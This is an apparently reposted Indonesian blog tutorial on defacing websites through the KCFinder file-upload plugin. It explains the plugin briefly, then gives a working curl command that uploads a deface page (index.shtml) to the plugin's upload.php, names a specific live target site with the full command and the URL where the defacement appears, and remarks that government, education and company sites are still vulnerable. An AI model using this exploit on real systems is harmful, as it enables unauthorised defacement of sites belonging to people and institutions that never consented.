KCFinder Upload Script Deface di Terminal dengan cURL
Selasa, 18 Desember 2018
Add Comment
KCFinder Upload Script Deface di Terminal dengan cURL - Selamat Datang sahabat Ashoy | Geboy, Pada Artikel yang anda baca kali ini dengan judul KCFinder Upload Script Deface di Terminal dengan cURL, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. Mudah-mudahan isi postingan Artikel Deface, Artikel New, Artikel Plugins, Artikel Terminal, Artikel Tutorial Deface, yang kami tulis ini ada manfaatnya. Baiklah, selamat membaca.
Judul : KCFinder Upload Script Deface di Terminal dengan cURLLink : KCFinder Upload Script Deface di Terminal dengan cURL Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.
- Apa itu Kcfinder?
KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.
- Apa itu cURL?
cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.
Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.
Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.
Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,
Bahan :
- Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
- Terminal / CMD
Tested :
- MAC OS X Yosemite
Step :
- Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
- lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
- Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.
Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
KCFinder Upload Script Deface di Terminal dengan cURL
Demikianlah Artikel KCFinder Upload Script Deface di Terminal dengan cURL
Sekianlah artikel KCFinder Upload Script Deface di Terminal dengan cURL kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. Sampai jumpa di postingan artikel lainnya.
Anda sekarang membaca artikel KCFinder Upload Script Deface di Terminal dengan cURL
https://tipsdantutorialblogging.blogspot.com/2018/12/kcfinder-upload-script-deface-di.html
0 Response to "KCFinder Upload Script Deface di Terminal dengan cURL"
Posting Komentar